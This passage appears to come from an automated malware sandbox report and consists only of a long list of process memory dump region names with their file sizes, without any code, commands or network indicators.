                                                                                                                                                                                                                                      • memory/1384-261-0x0000000000400000-0x0000000000AEC000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        6.9MB

                                                                                                                                                                                                                                      • memory/2272-184-0x0000000000400000-0x00000000008FB000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        5.0MB

                                                                                                                                                                                                                                      • memory/2272-147-0x0000000000400000-0x00000000008FB000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        5.0MB

                                                                                                                                                                                                                                      • memory/2272-154-0x0000000000400000-0x00000000008FB000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        5.0MB

                                                                                                                                                                                                                                      • memory/2272-153-0x0000000000400000-0x00000000008FB000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        5.0MB

                                                                                                                                                                                                                                      • memory/2272-152-0x0000000000400000-0x00000000008FB000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        5.0MB

                                                                                                                                                                                                                                      • memory/2272-151-0x0000000000400000-0x00000000008FB000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        5.0MB

                                                                                                                                                                                                                                      • memory/2272-156-0x0000000000400000-0x00000000008FB000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        5.0MB

                                                                                                                                                                                                                                      • memory/2272-150-0x0000000000400000-0x00000000008FB000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        5.0MB

                                                                                                                                                                                                                                      • memory/2272-148-0x0000000000400000-0x00000000008FB000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        5.0MB

                                                                                                                                                                                                                                      • memory/2272-157-0x0000000000400000-0x00000000008FB000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        5.0MB

                                                                                                                                                                                                                                      • memory/2272-149-0x0000000000400000-0x00000000008FB000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        5.0MB

                                                                                                                                                                                                                                      • memory/2272-158-0x0000000000400000-0x00000000008FB000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        5.0MB

                                                                                                                                                                                                                                      • memory/2272-145-0x0000000000400000-0x00000000008FB000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        5.0MB

                                                                                                                                                                                                                                      • memory/2272-159-0x0000000000400000-0x00000000008FB000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        5.0MB

                                                                                                                                                                                                                                      • memory/2272-146-0x0000000000400000-0x00000000008FB000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        5.0MB

                                                                                                                                                                                                                                      • memory/2272-155-0x0000000000400000-0x00000000008FB000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        5.0MB

                                                                                                                                                                                                                                      • memory/2272-140-0x0000000000400000-0x00000000008FB000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        5.0MB

                                                                                                                                                                                                                                      • memory/2272-185-0x0000000000400000-0x00000000008FB000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        5.0MB

                                                                                                                                                                                                                                      • memory/2272-160-0x0000000000400000-0x00000000008FB000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        5.0MB

                                                                                                                                                                                                                                      • memory/2272-258-0x0000000000400000-0x00000000008FB000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        5.0MB

                                                                                                                                                                                                                                      • memory/2272-183-0x0000000000400000-0x00000000008FB000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        5.0MB

                                                                                                                                                                                                                                      • memory/2272-182-0x0000000000400000-0x00000000008FB000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        5.0MB

                                                                                                                                                                                                                                      • memory/2272-179-0x0000000000400000-0x00000000008FB000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        5.0MB

                                                                                                                                                                                                                                      • memory/2272-173-0x0000000000400000-0x00000000008FB000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        5.0MB

                                                                                                                                                                                                                                      • memory/2272-175-0x0000000000400000-0x00000000008FB000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        5.0MB

                                                                                                                                                                                                                                      • memory/2272-176-0x0000000000400000-0x00000000008FB000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        5.0MB

                                                                                                                                                                                                                                      • memory/2272-174-0x0000000000400000-0x00000000008FB000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        5.0MB

                                                                                                                                                                                                                                      • memory/2272-143-0x0000000000400000-0x00000000008FB000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        5.0MB

                                                                                                                                                                                                                                      • memory/2272-164-0x0000000000400000-0x00000000008FB000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        5.0MB

                                                                                                                                                                                                                                      • memory/2272-163-0x0000000000400000-0x00000000008FB000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        5.0MB

                                                                                                                                                                                                                                      • memory/2272-162-0x0000000000400000-0x00000000008FB000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        5.0MB

                                                                                                                                                                                                                                      • memory/2272-161-0x0000000000400000-0x00000000008FB000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        5.0MB

                                                                                                                                                                                                                                      • memory/2896-137-0x00000000011D0000-0x0000000001577000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        3.7MB

                                                                                                                                                                                                                                      • memory/2896-306-0x00000000011D0000-0x0000000001577000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        3.7MB

                                                                                                                                                                                                                                      • memory/2896-66-0x00000000011D0000-0x0000000001577000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        3.7MB

                                                                                                                                                                                                                                      • memory/2896-84-0x00000000011D0000-0x0000000001577000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        3.7MB

                                                                                                                                                                                                                                      • memory/2896-144-0x00000000011D0000-0x0000000001577000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        3.7MB

                                                                                                                                                                                                                                      • memory/2896-194-0x00000000011D0000-0x0000000001577000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        3.7MB

                                                                                                                                                                                                                                      • memory/3336-342-0x0000000000930000-0x0000000000946000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        88KB

                                                                                                                                                                                                                                      • memory/3344-202-0x0000000005330000-0x0000000005331000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                      • memory/3344-201-0x0000000005340000-0x0000000005341000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                      • memory/3344-200-0x0000000005320000-0x0000000005321000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                      • memory/3344-203-0x00000000009E0000-0x0000000000E94000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        4.7MB

                                                                                                                                                                                                                                      • memory/3344-199-0x0000000005380000-0x0000000005381000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                      • memory/3344-195-0x00000000009E0000-0x0000000000E94000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        4.7MB

                                                                                                                                                                                                                                      • memory/3344-198-0x0000000005350000-0x0000000005351000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                      • memory/3344-197-0x0000000005360000-0x0000000005361000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                      • memory/3344-196-0x00000000009E0000-0x0000000000E94000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        4.7MB

                                                                                                                                                                                                                                      • memory/3368-56-0x0000018140F30000-0x0000018140F52000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        136KB

                                                                                                                                                                                                                                      • memory/3368-125-0x00007FF942920000-0x00007FF94330C000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        9.9MB

                                                                                                                                                                                                                                      • memory/3368-57-0x00007FF942920000-0x00007FF94330C000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        9.9MB

                                                                                                                                                                                                                                      • memory/3368-59-0x0000018140FC0000-0x0000018140FD0000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        64KB

                                                                                                                                                                                                                                      • memory/3368-61-0x0000018140FC0000-0x0000018140FD0000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        64KB

                                                                                                                                                                                                                                      • memory/3368-67-0x0000018141250000-0x00000181412C6000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        472KB

                                                                                                                                                                                                                                      • memory/3368-89-0x0000018140FC0000-0x0000018140FD0000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        64KB

                                                                                                                                                                                                                                      • memory/3368-103-0x0000018141210000-0x0000018141222000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        72KB

                                                                                                                                                                                                                                      • memory/3368-116-0x0000018140FA0000-0x0000018140FAA000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        40KB

                                                                                                                                                                                                                                      • memory/3688-322-0x0000000000400000-0x0000000000930000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        5.2MB

                                                                                                                                                                                                                                      • memory/3688-323-0x0000000000AC0000-0x0000000000AC1000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                      • memory/3936-326-0x0000000006CF0000-0x0000000006D26000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        216KB

                                                                                                                                                                                                                                      • memory/3936-327-0x0000000071630000-0x0000000071D1E000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        6.9MB

                                                                                                                                                                                                                                      • memory/3936-332-0x0000000007430000-0x0000000007A58000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        6.2MB

                                                                                                                                                                                                                                      • memory/3936-328-0x0000000006DF0000-0x0000000006E00000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        64KB

                                                                                                                                                                                                                                      • memory/3936-333-0x0000000007400000-0x0000000007422000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        136KB

                                                                                                                                                                                                                                      • memory/3936-334-0x0000000007AD0000-0x0000000007B36000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        408KB

                                                                                                                                                                                                                                      • memory/4208-251-0x0000000000400000-0x0000000000AF2000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        6.9MB

                                                                                                                                                                                                                                      • memory/4208-250-0x0000000000C30000-0x0000000000C3B000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        44KB

                                                                                                                                                                                                                                      • memory/4208-249-0x0000000000E70000-0x0000000000F70000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        1024KB

                                                                                                                                                                                                                                      • memory/4208-345-0x0000000000400000-0x0000000000AF2000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        6.9MB

                                                                                                                                                                                                                                      • memory/4596-231-0x0000000000B60000-0x0000000000C60000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        1024KB

                                                                                                                                                                                                                                      • memory/4596-232-0x0000000002780000-0x00000000027EE000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        440KB

                                                                                                                                                                                                                                      • memory/4596-321-0x0000000000400000-0x0000000000B10000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        7.1MB

                                                                                                                                                                                                                                      • memory/4596-233-0x0000000000400000-0x0000000000B10000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        7.1MB

                                                                                                                                                                                                                                      • memory/4748-30-0x00000000009E0000-0x0000000000E94000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        4.7MB

                                                                                                                                                                                                                                      • memory/4748-28-0x0000000004F30000-0x0000000004F31000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                      • memory/4748-248-0x00000000009E0000-0x0000000000E94000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        4.7MB

                                                                                                                                                                                                                                      • memory/4748-43-0x00000000009E0000-0x0000000000E94000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        4.7MB

                                                                                                                                                                                                                                      • memory/4748-31-0x00000000009E0000-0x0000000000E94000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        4.7MB

                                                                                                                                                                                                                                      • memory/4748-136-0x00000000009E0000-0x0000000000E94000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        4.7MB

                                                                                                                                                                                                                                      • memory/4748-29-0x0000000004F20000-0x0000000004F21000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                      • memory/4748-193-0x00000000009E0000-0x0000000000E94000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        4.7MB

                                                                                                                                                                                                                                      • memory/4748-27-0x0000000004EB0000-0x0000000004EB1000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                      • memory/4748-26-0x0000000004EA0000-0x0000000004EA1000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                      • memory/4748-25-0x0000000004F00000-0x0000000004F01000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                      • memory/4748-24-0x0000000004EC0000-0x0000000004EC1000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                      • memory/4748-22-0x0000000004ED0000-0x0000000004ED1000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                      • memory/4748-23-0x0000000004EE0000-0x0000000004EE1000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                      • memory/4748-21-0x00000000009E0000-0x0000000000E94000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        4.7MB

                                                                                                                                                                                                                                      • memory/4748-19-0x00000000009E0000-0x0000000000E94000-memory.dmp

                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                        4.7MB